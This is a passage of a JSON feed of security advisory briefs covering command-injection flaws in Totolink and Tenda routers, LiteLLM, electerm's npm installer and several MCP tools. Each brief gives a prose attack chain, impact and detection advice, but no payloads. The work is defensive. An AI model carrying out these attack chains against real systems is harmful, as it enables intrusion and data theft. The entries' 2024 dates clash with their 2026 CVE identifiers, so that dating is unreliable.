\u003ccode\u003eproto\u003c/code\u003e argument. This payload is designed to execute arbitrary OS commands.\u003c/li\u003e\n\u003cli\u003eThe CGI handler processes the request without proper sanitization of the \u003ccode\u003eproto\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe unsanitized input from the \u003ccode\u003eproto\u003c/code\u003e argument is passed directly to a system call, resulting in OS command injection.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to execute arbitrary code on the router, potentially including downloading and executing a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a persistent foothold and can perform further malicious activities, such as network reconnaissance, data exfiltration, or using the compromised device as part of a botnet.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7538 grants attackers complete control over the affected Totolink A8000RU router. This can lead to a variety of malicious outcomes, including unauthorized access to the local network, data theft, and the use of the router as a node in a botnet for DDoS attacks or other malicious campaigns. Given the availability of a public exploit, widespread exploitation is possible if devices are not promptly patched or protected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates for Totolink A8000RU version 7.1cu.643_b20200521 to remediate CVE-2026-7538.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect malicious HTTP requests targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint with suspicious payloads in the \u003ccode\u003eproto\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink A8000RU Command Injection Attempt\u003c/code\u003e to your SIEM to identify exploitation attempts based on suspicious HTTP requests.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual activity or errors related to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-totolink-a8000ru-rce/","summary":"A remote OS command injection vulnerability exists in Totolink A8000RU version 7.1cu.643_b20200521 via manipulation of the 'proto' argument in the /cgi-bin/cstecgi.cgi CGI handler, potentially leading to complete system compromise.","title":"Totolink A8000RU OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-totolink-a8000ru-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7096"}],"_cs_exploited":false,"_cs_products":["HG3 2.0 300003070"],"_cs_severities":["critical"],"_cs_tags":["command-injection","router","tenda"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical command injection vulnerability, identified as CVE-2026-7096, affects Tenda HG3 2.0 300003070 routers. The vulnerability resides in the \u0026lsquo;formgponConf\u0026rsquo; function within the \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; file. An attacker can exploit this flaw by manipulating the \u0026lsquo;fmgpon_loid\u0026rsquo; argument. Successful exploitation allows a remote attacker to execute arbitrary operating system commands on the affected device. Given the public availability of an exploit, Tenda HG3 devices are at immediate risk of compromise. This poses a significant threat as attackers can potentially gain full control of the router, compromise connected networks, and exfiltrate sensitive information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda HG3 2.0 300003070 router with an exposed web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a payload containing OS commands into the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter of the POST request.\u003c/li\u003e\n\u003cli\u003eThe Tenda HG3 router\u0026rsquo;s web server processes the request without proper input validation of the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the router\u0026rsquo;s operating system with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the Tenda HG3 router.\u003c/li\u003e\n\u003cli\u003eThe attacker may establish a reverse shell to maintain persistent access or download further malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker can then pivot to internal networks, exfiltrate data, or use the compromised router for other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7096 grants attackers the ability to execute arbitrary OS commands on the Tenda HG3 router. This can lead to complete compromise of the device, allowing attackers to modify router settings, intercept network traffic, and potentially gain access to connected devices on the local network. Given the widespread use of Tenda routers in home and small business environments, a successful attack could impact thousands of users. The vulnerability\u0026rsquo;s high CVSS score of 8.8 underscores the severity and potential for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda HG3 Command Injection Attempt\u0026rdquo; to your SIEM to identify exploitation attempts by monitoring HTTP POST requests to \u0026lsquo;/boaform/admin/formgponConf\u0026rsquo; with suspicious commands in the \u0026lsquo;fmgpon_loid\u0026rsquo; parameter.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect malicious payloads in HTTP POST requests targeting the vulnerable endpoint, as described in the \u0026ldquo;Attack Chain\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eWhile no specific IOCs are provided, analyze network traffic and web server logs for unusual activity originating from or targeting Tenda HG3 routers.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP POST requests to /boaform/admin/formgponConf (described in Attack Chain step 2).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-tenda-hg3-command-injection/","summary":"A command injection vulnerability (CVE-2026-7096) exists in the Tenda HG3 2.0 300003070 router, allowing remote attackers to execute arbitrary OS commands by manipulating the 'fmgpon_loid' argument in the 'formgponConf' function of the '/boaform/admin/formgponConf' file due to insufficient input validation.","title":"Tenda HG3 Router Command Injection Vulnerability (CVE-2026-7096)","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-hg3-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7058"}],"_cs_exploited":false,"_cs_products":["MiroFish"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","ipc"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-7058, affects 666ghj MiroFish up to version 0.1.2. The vulnerability resides in the \u003ccode\u003eSimulationIPCClient.send_command\u003c/code\u003e function within the \u003ccode\u003ebackend/app/services/simulation_ipc.py\u003c/code\u003e file, specifically within the Inter-Process Communication component. This flaw allows a remote attacker to inject and execute arbitrary commands on the system. Public disclosure of the exploit exists, increasing the risk of exploitation. The vendor was notified, but has not yet responded. This vulnerability poses a significant risk as it allows for complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable MiroFish instance running version 0.1.2 or earlier.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious command injection payload.\u003c/li\u003e\n\u003cli\u003eAttacker sends a request to the \u003ccode\u003eSimulationIPCClient.send_command\u003c/code\u003e function via the Inter-Process Communication mechanism.\u003c/li\u003e\n\u003cli\u003eThe vulnerable function \u003ccode\u003eSimulationIPCClient.send_command\u003c/code\u003e fails to properly sanitize the attacker-supplied input.\u003c/li\u003e\n\u003cli\u003eThe unsanitized input is passed to a system call.\u003c/li\u003e\n\u003cli\u003eThe system executes the injected command with the privileges of the MiroFish process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as installing malware, exfiltrating data, or pivoting to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this command injection vulnerability (CVE-2026-7058) allows an attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data breaches, denial of service, or further lateral movement within the network. Given the public availability of the exploit, organizations using MiroFish 0.1.2 or earlier are at high risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply appropriate input validation and sanitization to the \u003ccode\u003eSimulationIPCClient.send_command\u003c/code\u003e function to prevent command injection.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the \u003ccode\u003ebackend/app/services/simulation_ipc.py\u003c/code\u003e endpoint (see rules below).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided to detect potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-mirofish-command-injection/","summary":"A command injection vulnerability exists in 666ghj MiroFish version 0.1.2 via the SimulationIPCClient.send_command function, allowing remote attackers to execute arbitrary commands.","title":"MiroFish Command Injection Vulnerability (CVE-2026-7058)","url":"https://feed.craftedsignal.io/briefs/2024-01-03-mirofish-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7443"}],"_cs_exploited":false,"_cs_products":["mcp-dnstwist"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability"],"_cs_type":"advisory","_cs_vendors":["BurtTheCoder"],"content_html":"\u003cp\u003eCVE-2026-7443 describes an OS command injection vulnerability affecting BurtTheCoder\u0026rsquo;s mcp-dnstwist, a tool potentially used for detecting and preventing typosquatting attacks. The vulnerability resides in versions up to 1.0.4. The affected function, \u003ccode\u003efuzz_domain\u003c/code\u003e, located in the \u003ccode\u003esrc/index.ts\u003c/code\u003e file of the MCP Interface component, is susceptible to command injection. An attacker can manipulate the Request argument to inject arbitrary OS commands. This is a remotely exploitable vulnerability, meaning an attacker can trigger it over a network connection. Public exploits are available, increasing the risk of widespread exploitation. The vulnerability was reported to the project maintainers, but no response or patch has been released as of this writing.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable instance of mcp-dnstwist running version 1.0.4 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the MCP Interface component.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a payload designed to exploit the \u003ccode\u003efuzz_domain\u003c/code\u003e function in \u003ccode\u003esrc/index.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious payload manipulates the Request argument, injecting OS commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efuzz_domain\u003c/code\u003e function, without proper sanitization, executes the injected OS commands.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server hosting mcp-dnstwist.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial access to escalate privileges or move laterally within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary OS commands on the system hosting mcp-dnstwist. This could lead to complete system compromise, data breaches, or denial-of-service conditions. Given that mcp-dnstwist might be used in security-sensitive environments, a successful attack could have significant impact. The lack of a patch and the availability of public exploits increase the likelihood of exploitation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSince no patch is available, immediately discontinue use of mcp-dnstwist versions up to 1.0.4.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious requests targeting mcp-dnstwist instances by deploying the Sigma rule \u003ccode\u003eDetect Suspicious mcp-dnstwist Requests\u003c/code\u003e to your SIEM.\u003c/li\u003e\n\u003cli\u003eIf continued use is unavoidable, implement strict input validation and sanitization on the Request argument passed to the \u003ccode\u003efuzz_domain\u003c/code\u003e function in \u003ccode\u003esrc/index.ts\u003c/code\u003e. However, this is not a substitute for patching the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-mcp-dnstwist-command-injection/","summary":"An OS command injection vulnerability exists in BurtTheCoder's mcp-dnstwist version 1.0.4 and earlier due to improper handling of the Request argument in the fuzz_domain function within src/index.ts, potentially allowing remote attackers to execute arbitrary commands.","title":"mcp-dnstwist OS Command Injection Vulnerability (CVE-2026-7443)","url":"https://feed.craftedsignal.io/briefs/2024-01-03-mcp-dnstwist-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["litellm"],"_cs_severities":["high"],"_cs_tags":["rce","litellm","command-injection"],"_cs_type":"advisory","_cs_vendors":["pip"],"content_html":"\u003cp\u003eLiteLLM versions 1.74.2 through 1.83.6 are vulnerable to authenticated command execution. Two endpoints, \u003ccode\u003ePOST /mcp-rest/test/connection\u003c/code\u003e and \u003ccode\u003ePOST /mcp-rest/test/tools/list\u003c/code\u003e, intended for previewing MCP server configurations, allowed any authenticated user to execute arbitrary commands on the proxy host. This was possible because the endpoints accepted a full server configuration in the request body, including the \u003ccode\u003ecommand\u003c/code\u003e, \u003ccode\u003eargs\u003c/code\u003e, and \u003ccode\u003eenv\u003c/code\u003e fields used by the stdio transport, without proper role checks. An attacker could exploit this vulnerability by using a low-privilege API key to send a crafted request containing malicious commands, leading to command execution with the privileges of the proxy process. The vulnerability was patched in version 1.83.7 by enforcing the \u003ccode\u003ePROXY_ADMIN\u003c/code\u003e role for these endpoints.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the LiteLLM proxy with a valid, but low-privilege, API key.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious JSON payload containing a server configuration intended for the stdio transport. The payload includes the \u003ccode\u003ecommand\u003c/code\u003e, \u003ccode\u003eargs\u003c/code\u003e, and \u003ccode\u003eenv\u003c/code\u003e fields, which specify the command to be executed, its arguments, and environment variables, respectively.\u003c/li\u003e\n\u003cli\u003eAttacker sends a \u003ccode\u003ePOST\u003c/code\u003e request to either the \u003ccode\u003e/mcp-rest/test/connection\u003c/code\u003e or \u003ccode\u003e/mcp-rest/test/tools/list\u003c/code\u003e endpoint, with the malicious JSON payload in the request body.\u003c/li\u003e\n\u003cli\u003eThe LiteLLM proxy receives the request and, due to the vulnerability, attempts to connect to the supplied server configuration.\u003c/li\u003e\n\u003cli\u003eThe proxy spawns the supplied command as a subprocess on the proxy host, using the privileges of the proxy process.\u003c/li\u003e\n\u003cli\u003eThe attacker-supplied command executes arbitrary code on the host.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the proxy host with the privileges of the LiteLLM proxy.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the host running the LiteLLM proxy. Since the vulnerability can be exploited with a low-privilege API key, this significantly broadens the attack surface. Depending on the privileges of the proxy process, this could lead to full system compromise, data exfiltration, or denial of service. The lack of specific victim count or sector targeting information in the advisory suggests a broad potential impact across various deployments of LiteLLM.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade LiteLLM to version 1.83.7 or later to remediate the vulnerability (see Patches).\u003c/li\u003e\n\u003cli\u003eAs a temporary workaround, block \u003ccode\u003ePOST\u003c/code\u003e requests to the \u003ccode\u003e/mcp-rest/test/connection\u003c/code\u003e and \u003ccode\u003e/mcp-rest/test/tools/list\u003c/code\u003e endpoints at your reverse proxy or API gateway (see Workarounds).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for \u003ccode\u003ePOST\u003c/code\u003e requests to \u003ccode\u003e/mcp-rest/test/connection\u003c/code\u003e and \u003ccode\u003e/mcp-rest/test/tools/list\u003c/code\u003e endpoints, looking for suspicious \u003ccode\u003ecommand\u003c/code\u003e, \u003ccode\u003eargs\u003c/code\u003e, and \u003ccode\u003eenv\u003c/code\u003e parameters in the request body (see rules below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-litellm-rce/","summary":"Authenticated users with low-privilege API keys could execute arbitrary commands on the host running LiteLLM via the `/mcp-rest/test/connection` and `/mcp-rest/test/tools/list` endpoints, by submitting a server configuration including command execution parameters.","title":"LiteLLM Authenticated Command Execution via MCP stdio Test Endpoints","url":"https://feed.craftedsignal.io/briefs/2024-01-litellm-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["electerm"],"_cs_severities":["critical"],"_cs_tags":["command-injection","electerm","npm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical command injection vulnerability has been identified in Electerm, specifically affecting users who install the application via \u003ccode\u003enpm install -g electerm\u003c/code\u003e on Linux systems. The vulnerability resides within the \u003ccode\u003erunLinux()\u003c/code\u003e function in \u003ccode\u003egithub.com/elcterm/electerm/npm/install.js\u003c/code\u003e. This function lacks proper validation when appending remote version strings into an \u003ccode\u003eexec(\u0026quot;rm -rf ...\u0026quot;)\u003c/code\u003e command. An attacker capable of controlling the remote release metadata (e.g., version string, release name) served by Electerm\u0026rsquo;s update server could exploit this flaw to execute arbitrary system commands. This could lead to tampering with local files and a complete compromise of development or runtime assets. This vulnerability affects Electerm versions prior to 3.3.8.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains control over the Electerm update server or performs a man-in-the-middle attack.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts malicious release metadata, including a crafted version string containing command injection payloads.\u003c/li\u003e\n\u003cli\u003eA user on a Linux system executes \u003ccode\u003enpm install -g electerm\u003c/code\u003e to install or update Electerm.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003einstall.js\u003c/code\u003e script fetches the malicious release metadata from the compromised update server.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erunLinux()\u003c/code\u003e function appends the attacker-controlled version string directly into an \u003ccode\u003eexec(\u0026quot;rm -rf ...\u0026quot;)\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eexec()\u003c/code\u003e function executes the command, resulting in arbitrary command execution with the privileges of the user running \u003ccode\u003enpm install\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker can then tamper with local files, install backdoors, or escalate privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves complete system compromise, potentially exfiltrating sensitive data or using the compromised system as a pivot point.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to execute arbitrary system commands on the victim\u0026rsquo;s machine. This can lead to complete system compromise, including unauthorized access to sensitive data, installation of malware, and further propagation of the attack within the network. Given the nature of \u003ccode\u003enpm install\u003c/code\u003e, developers are primarily at risk. The impact could be significant for development environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the following rule to detect command injection attempts within npm installations referencing the electerm package: \u003ccode\u003eElecterm NPM install Command Injection\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections to unexpected or suspicious update servers that could be serving malicious Electerm release metadata using network connection logs.\u003c/li\u003e\n\u003cli\u003eWhile the vulnerability is patched in later versions, ensure users are aware of the risks associated with running older versions of Electerm (\u003ccode\u003e\u0026lt; 3.3.8\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-electerm-command-injection/","summary":"A command injection vulnerability exists in electerm's install.js due to insufficient validation in the runLinux() function, allowing attackers to execute arbitrary commands by manipulating remote release metadata.","title":"Electerm Command Injection Vulnerability via runLinux Function","url":"https://feed.craftedsignal.io/briefs/2024-01-electerm-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7316"}],"_cs_exploited":false,"_cs_products":["aider-mcp"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","aider-mcp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-7316, has been discovered in eiliyaabedini aider-mcp up to commit 667b914301aada695aab0e46d1fb3a7d5e32c8af. The vulnerability resides within an unspecified function of the \u003ccode\u003eaider_mcp.py\u003c/code\u003e file, specifically related to the \u003ccode\u003ecode_with_ai\u003c/code\u003e component. An attacker can exploit this flaw by manipulating the \u003ccode\u003eworking_dir/editable_files\u003c/code\u003e argument, leading to arbitrary command execution on the affected system. The exploit has been publicly disclosed, increasing the risk of exploitation. The aider-mcp project employs a rolling release model, which complicates identifying specific affected versions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA remote attacker identifies an instance of aider-mcp running with accessible \u003ccode\u003eaider_mcp.py\u003c/code\u003e code.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing OS commands, targeting the \u003ccode\u003eworking_dir/editable_files\u003c/code\u003e argument of the vulnerable function within \u003ccode\u003eaider_mcp.py\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted payload to the aider-mcp instance through a network request, potentially via HTTP or another supported protocol.\u003c/li\u003e\n\u003cli\u003eThe vulnerable function in \u003ccode\u003eaider_mcp.py\u003c/code\u003e processes the attacker-supplied \u003ccode\u003eworking_dir/editable_files\u003c/code\u003e argument without proper sanitization or validation.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands within the \u003ccode\u003eworking_dir/editable_files\u003c/code\u003e argument are executed by the aider-mcp instance.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary command execution on the server, allowing them to perform actions such as reading sensitive files, modifying system configurations, or installing malware.\u003c/li\u003e\n\u003cli\u003eThe attacker may establish persistence by creating a new user account or modifying startup scripts.\u003c/li\u003e\n\u003cli\u003eThe attacker further compromises the system or pivots to other systems in the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data theft, or denial of service. Given the public disclosure of the exploit, systems running vulnerable versions of aider-mcp are at significant risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for commands being executed with a parent process associated with aider-mcp to detect potential command injection attempts using the \u003ccode\u003eAiderMCPCommandInjection\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eInspect web server logs for suspicious requests containing unusual characters or command sequences in the \u003ccode\u003eworking_dir\u003c/code\u003e or \u003ccode\u003eeditable_files\u003c/code\u003e parameters that may indicate command injection attempts.\u003c/li\u003e\n\u003cli\u003eWhile specific version information is unavailable, attempt to identify and patch any instances of aider-mcp using indicators of compromise or behavioral detections until a patched version is released.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-aider-mcp-command-injection/","summary":"A command injection vulnerability (CVE-2026-7316) exists in eiliyaabedini aider-mcp, allowing remote attackers to execute arbitrary commands by manipulating the working_dir/editable_files argument in the aider_mcp.py file.","title":"Aider-MCP Command Injection Vulnerability (CVE-2026-7316)","url":"https://feed.craftedsignal.io/briefs/2024-01-aider-mcp-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-6980"}],"_cs_exploited":false,"_cs_products":["GitPilot-MCP"],"_cs_severities":["high"],"_cs_tags":["command-injection","web-application","cve"],"_cs_type":"advisory","_cs_vendors":["Divyanshu-hash"],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-6980, has been discovered in the GitPilot-MCP project by Divyanshu-hash. The vulnerability affects versions up to 9ed9f153ba4158a2ad230ee4871b25130da29ffd. Attackers can exploit this flaw by manipulating the \u003ccode\u003ecommand\u003c/code\u003e argument passed to the \u003ccode\u003erepo_path\u003c/code\u003e function within the \u003ccode\u003emain.py\u003c/code\u003e file. This manipulation enables remote command execution on the affected system. Publicly available exploit code exists, increasing the risk of exploitation. The vendor was notified, but did not respond. This vulnerability poses a significant risk to systems running GitPilot-MCP, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a GitPilot-MCP instance running a vulnerable version (\u0026lt;= 9ed9f153ba4158a2ad230ee4871b25130da29ffd).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003erepo_path\u003c/code\u003e function in \u003ccode\u003emain.py\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eWithin the HTTP request, the attacker injects a command payload into the \u003ccode\u003ecommand\u003c/code\u003e argument. This payload is designed to execute arbitrary commands on the server.\u003c/li\u003e\n\u003cli\u003eThe GitPilot-MCP application processes the request without proper sanitization of the \u003ccode\u003ecommand\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003erepo_path\u003c/code\u003e function executes the injected command using a system call (e.g., \u003ccode\u003eos.system()\u003c/code\u003e or similar).\u003c/li\u003e\n\u003cli\u003eThe injected command executes with the privileges of the GitPilot-MCP application user, potentially allowing for escalated privileges if the application runs as a privileged user.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform various malicious activities, such as installing malware, stealing sensitive data, or pivoting to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6980 allows a remote attacker to execute arbitrary commands on the affected system. The impact of this vulnerability is high, as it could lead to complete system compromise, data breaches, and further malicious activity within the network. Since public exploit code is available, the risk of widespread exploitation is increased. The lack of vendor response further exacerbates the issue, leaving users vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for suspicious requests targeting \u003ccode\u003emain.py\u003c/code\u003e with unusual characters or command-like syntax in the \u003ccode\u003ecommand\u003c/code\u003e parameter, and deploy the \u0026ldquo;GitPilot-MCP Command Injection Attempt\u0026rdquo; Sigma rule to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unexpected processes spawned by the GitPilot-MCP application, using the \u0026ldquo;GitPilot-MCP Suspicious Child Process\u0026rdquo; Sigma rule to identify potentially malicious activity.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all user-supplied input, especially the \u003ccode\u003ecommand\u003c/code\u003e argument in the \u003ccode\u003erepo_path\u003c/code\u003e function, to prevent command injection attacks.\u003c/li\u003e\n\u003cli\u003eApply any available patches or updates for GitPilot-MCP as soon as they are released to address the vulnerability.\u003c/li\u003e\n\u003cli\u003eConsider deploying a web application firewall (WAF) to filter out malicious requests targeting the \u003ccode\u003erepo_path\u003c/code\u003e function.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-gitpilot-command-injection/","summary":"A command injection vulnerability (CVE-2026-6980) in Divyanshu-hash GitPilot-MCP up to version 9ed9f153ba4158a2ad230ee4871b25130da29ffd allows remote attackers to execute arbitrary commands by manipulating the 'command' argument in the repo_path function of main.py, and public exploit code is available.","title":"GitPilot-MCP Command Injection Vulnerability (CVE-2026-6980)","url":"https://feed.craftedsignal.io/briefs/2024-01-02-gitpilot-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7220"}],"_cs_exploited":false,"_cs_products":["FastlyMCP"],"_cs_severities":["high"],"_cs_tags":["command-injection","cve-2026-7220","fastly-mcp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-7220, has been discovered in jackwrichards FastlyMCP up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620. The vulnerability resides within the \u003ccode\u003efastly-mcp.mjs\u003c/code\u003e file of the \u003ccode\u003efastly_cli Tool\u003c/code\u003e component. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands by manipulating the \u003ccode\u003ecommand\u003c/code\u003e argument. The exploit is publicly known and actively usable. Given FastlyMCP\u0026rsquo;s rolling release model, specific affected versions are 